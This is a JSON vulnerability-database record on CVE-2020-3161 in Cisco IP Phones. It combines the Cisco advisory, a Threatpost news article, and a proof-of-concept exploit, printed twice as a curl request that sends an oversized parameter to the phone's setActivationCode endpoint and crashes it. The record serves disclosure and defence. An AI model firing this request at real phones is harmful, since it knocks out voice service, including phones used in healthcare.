\nhttps://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/157265/ciscoipphone117-dos.txt"}], "cisco": [{"lastseen": "2020-12-24T11:40:34", "bulletinFamily": "software", "cvelist": ["CVE-2020-3161"], "description": "A vulnerability in the web server for Cisco IP Phones could allow an unauthenticated, remote attacker to execute code with root privileges or cause a reload of an affected IP phone, resulting in a denial of service (DoS) condition.\n\nThe vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs\"]", "modified": "2020-04-16T15:57:25", "published": "2020-04-15T16:00:00", "id": "CISCO-SA-VOIP-PHONES-RCE-DOS-RB6EERXS", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs", "type": "cisco", "title": "Cisco IP Phones Web Server Remote Code Execution and Denial of Service Vulnerability", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "exploitdb": [{"lastseen": "2020-04-17T11:48:26", "description": "", "published": "2020-04-17T00:00:00", "type": "exploitdb", "title": "Cisco IP Phone 11.7 - Denial of service (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3161"], "modified": "2020-04-17T00:00:00", "id": "EDB-ID:48342", "href": "https://www.exploit-db.com/exploits/48342", "sourceData": "# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)\r\n# Date: 2020-04-15\r\n# Exploit Author: Jacob Baines\r\n# Vendor Homepage: https://www.cisco.com\r\n# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html\r\n# Version: Before 11.7(1)\r\n# Tested on: Cisco Wireless IP Phone 8821\r\n# CVE: CVE-2020-3161\r\n# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs\r\n# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24\r\n\r\ncurl -v --path-as-is --insecure\r\nhttps://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/48342"}], "threatpost": [{"lastseen": "2020-10-15T22:21:15", "bulletinFamily": "info", "cvelist": ["CVE-2016-1421", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3161", "CVE-2020-3239", "CVE-2020-3240", "CVE-2020-3243", "CVE-2020-3247", "CVE-2020-3248", "CVE-2020-3249", "CVE-2020-3250", "CVE-2020-3251", "CVE-2020-3252", "CVE-2020-5135"], "description": "Cisco is warning of a critical flaw in the web server of its IP phones. If exploited, the flaw could allow an unauthenticated, remote attacker to execute code with root privileges or launch a denial-of-service (DoS) attack.\n\nProof-of-concept (PoC) exploit code has been posted [on GitHub](<https://github.com/tenable/poc/blob/master/cisco/ip_phone/cve_2020_3161.txt>) for the vulnerability ([CVE-2020-3161](<https://nvd.nist.gov/vuln/detail/CVE-2020-3161>)), which ranks 9.8 out of 10 on the CVSS scale. Cisco issued patches in a [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) for the flaw, which affects various versions of its Cisco IP phones for small- to medium-sized businesses.\n\nAccording to Jacob Baines with Tenable, [who discovered the flaw](<https://www.tenable.com/security/research/tra-2020-24>), Cisco IP phone web servers lack proper input validation for HTTP requests. To exploit the bug, an attacker could merely send a crafted HTTP request to the /deviceconfig/setActivationCode endpoint (on the web server of the targeted device).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThis triggers a stack-based buffer overflow due to the lack of input validation: \u201cIn libHTTPService.so, the parameters after /deviceconfig/setActivationCode are used to create a new URI via a sprintf function call. The length of the parameter string is not checked,\u201d according to Baines.\n\nThe end result is the attacker being able to crash the device, or even potentially execute code remotely.\n\nAffected products include: IP Phone 7811, 7821, 7841, and 7861 Desktop Phones; IP Phone 8811, 8841, 8845, 8851, 8861, and 8865 Desktop Phones; Unified IP Conference Phone 8831 and Wireless IP Phone 8821 and 8821-EX.\n\nOf note, according to Cisco, [some of these products](<https://www.cisco.com/c/en/us/products/collaboration-endpoints/wireless-ip-phone-8821/index.html>) (particularly the Wireless IP Phone 8821 and 8821-EX) are utilized by the healthcare industry who are currently on the frontlines of the [coronavirus pandemic.](<https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/>)\n\n[![critical cisco flaw IP Phone](https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132716/cisco-critical-flaw-1-1024x199.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132716/cisco-critical-flaw-1.png>)\n\nCisco has also confirmed various products that aren\u2019t affected by the flaw[ on its website.](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) Beyond Cisco\u2019s patches, one mitigation for the flaw is disabling web access on the IP phones (in fact, web access is disabled by default on IP phones), according to Cisco.\n\nNew findings by Tenable\u2019s Baines also led Cisco to bump up the severity of a previously-discovered vulnerability (CVE-2016-1421) in its IP phones to critical on Wednesday. Previously the flaw was medium-severity ([ranking 5 out of 10](<https://www.cvedetails.com/cve/CVE-2016-1421/>) on the CVSS scale).\n\nHowever, Baines found that the flaw could be exploited by an unauthenticated actor (previously Cisco said exploiting the flaw required authentication) and could potentially enable remote code execution as well as DoS (previously Cisco found it could only enable DoS). Baines also found a produce, the Wireless IP Phone 8821, to be vulnerable that wasn\u2019t listed on the affected list.\n\n**Other Critical Flaws**\n\nCisco [Wednesday also addressed](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsd-mult-vulns-UNfpdW4E>) critical- and high-severity flaws tied to nine CVEs in its Cisco Unified Computing System (UCS) Director and Cisco UCS Director Express for Big Data. Cisco UCS Director is an end-to-end management platform for various Cisco and non-Cisco data infrastructure components. Cisco UCS Director Express for Big Data is an open private-cloud platform that delivers Big-Data-as-a-Service on premises.\n\nThe flaws (CVE-2020-3239, CVE-2020-3240, CVE-2020-3243, CVE-2020-3247, CVE-2020-3248, CVE-2020-3249, CVE-2020-3250, CVE-2020-3251, CVE-2020-3252) exist in the REST API for both products, and may allow a remote attacker to bypass authentication or conduct directory traversal attacks on an affected device. Below is a list of affected products and the fixed releases.\n\n[![critical cisco flaw ](https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132738/cisco-critical-flaw-2-1024x457.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132738/cisco-critical-flaw-2.png>)\n\nSteven Seeley of Source Incite, working with Trend Micro\u2019s Zero Day Initiative, was credited with reporting the flaws.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory,\u201d according to Cisco.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "modified": "2020-04-16T18:49:27", "published": "2020-04-16T18:49:27", "id": "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "href": "https://threatpost.com/critical-cisco-ip-phone-rce-flaw/154864/", "type": "threatpost", "title": "Cisco IP Phone Harbors Critical RCE Flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}